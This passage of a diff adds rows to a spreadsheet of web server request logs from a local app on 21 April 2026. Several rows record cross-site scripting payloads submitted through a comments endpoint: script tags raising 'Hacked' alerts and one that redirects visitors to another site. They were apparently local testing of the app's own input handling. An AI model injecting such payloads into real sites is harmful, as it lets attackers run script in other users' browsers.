+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F45" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="46">
+      <c r="A46" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B46" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C46" t="inlineStr">
+        <is>
+          <t>11:02:02</t>
+        </is>
+      </c>
+      <c r="D46" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E46" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F46" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="47">
+      <c r="A47" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B47" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C47" t="inlineStr">
+        <is>
+          <t>11:02:35</t>
+        </is>
+      </c>
+      <c r="D47" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E47" t="inlineStr">
+        <is>
+          <t>/comments/add?name=soumyadeep1234&amp;comment=%0Apiyush</t>
+        </is>
+      </c>
+      <c r="F47" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="48">
+      <c r="A48" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B48" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C48" t="inlineStr">
+        <is>
+          <t>11:02:35</t>
+        </is>
+      </c>
+      <c r="D48" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E48" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F48" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="49">
+      <c r="A49" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B49" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C49" t="inlineStr">
+        <is>
+          <t>11:02:35</t>
+        </is>
+      </c>
+      <c r="D49" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E49" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F49" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="50">
+      <c r="A50" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B50" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C50" t="inlineStr">
+        <is>
+          <t>11:02:35</t>
+        </is>
+      </c>
+      <c r="D50" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E50" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F50" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="51">
+      <c r="A51" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B51" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C51" t="inlineStr">
+        <is>
+          <t>11:04:58</t>
+        </is>
+      </c>
+      <c r="D51" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E51" t="inlineStr">
+        <is>
+          <t>/comments/add?name=soumyadeep1234&amp;comment=&lt;script&gt;alert("Hacked")&lt;/script&gt;%0A</t>
+        </is>
+      </c>
+      <c r="F51" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="52">
+      <c r="A52" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B52" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C52" t="inlineStr">
+        <is>
+          <t>11:04:58</t>
+        </is>
+      </c>
+      <c r="D52" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E52" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F52" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="53">
+      <c r="A53" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B53" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C53" t="inlineStr">
+        <is>
+          <t>11:04:58</t>
+        </is>
+      </c>
+      <c r="D53" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E53" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F53" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="54">
+      <c r="A54" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B54" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C54" t="inlineStr">
+        <is>
+          <t>11:04:58</t>
+        </is>
+      </c>
+      <c r="D54" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E54" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F54" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="55">
+      <c r="A55" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B55" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C55" t="inlineStr">
+        <is>
+          <t>11:06:00</t>
+        </is>
+      </c>
+      <c r="D55" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E55" t="inlineStr">
+        <is>
+          <t>/comments/add?name=cghh&amp;comment=%0A&lt;script&gt;alert("I+AM+PIYUSH+.+THE+HACKER.")&lt;/script&gt;%0A</t>
+        </is>
+      </c>
+      <c r="F55" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="56">
+      <c r="A56" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B56" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C56" t="inlineStr">
+        <is>
+          <t>11:06:00</t>
+        </is>
+      </c>
+      <c r="D56" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E56" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F56" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="57">
+      <c r="A57" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B57" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C57" t="inlineStr">
+        <is>
+          <t>11:06:00</t>
+        </is>
+      </c>
+      <c r="D57" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E57" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F57" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="58">
+      <c r="A58" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B58" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C58" t="inlineStr">
+        <is>
+          <t>11:06:00</t>
+        </is>
+      </c>
+      <c r="D58" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E58" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F58" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="59">
+      <c r="A59" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B59" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C59" t="inlineStr">
+        <is>
+          <t>11:09:18</t>
+        </is>
+      </c>
+      <c r="D59" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E59" t="inlineStr">
+        <is>
+          <t>/comments/add?name=fxf&amp;comment=&lt;script&gt;%0Awindow.location.href+%3D+"https://google.com";%0A&lt;/script&gt;%0A</t>
+        </is>
+      </c>
+      <c r="F59" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="60">
+      <c r="A60" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B60" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C60" t="inlineStr">
+        <is>
+          <t>11:09:18</t>
+        </is>
+      </c>
+      <c r="D60" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E60" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F60" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="61">
+      <c r="A61" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B61" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C61" t="inlineStr">
+        <is>
+          <t>11:09:18</t>
+        </is>
+      </c>
+      <c r="D61" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E61" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F61" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="62">
+      <c r="A62" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B62" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C62" t="inlineStr">
+        <is>
+          <t>11:09:18</t>
+        </is>
+      </c>
+      <c r="D62" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E62" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F62" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="63">
+      <c r="A63" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B63" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C63" t="inlineStr">
+        <is>
+          <t>11:09:30</t>
+        </is>
+      </c>
+      <c r="D63" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E63" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F63" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="64">
+      <c r="A64" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B64" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C64" t="inlineStr">
+        <is>
+          <t>11:09:30</t>
+        </is>
+      </c>
+      <c r="D64" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E64" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F64" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="65">
+      <c r="A65" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B65" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C65" t="inlineStr">
+        <is>
+          <t>11:09:30</t>
+        </is>
+      </c>
+      <c r="D65" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E65" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F65" t="inlineStr">
+        <is>
+          <t>304</t>
         </is>
       </c>
     </row>
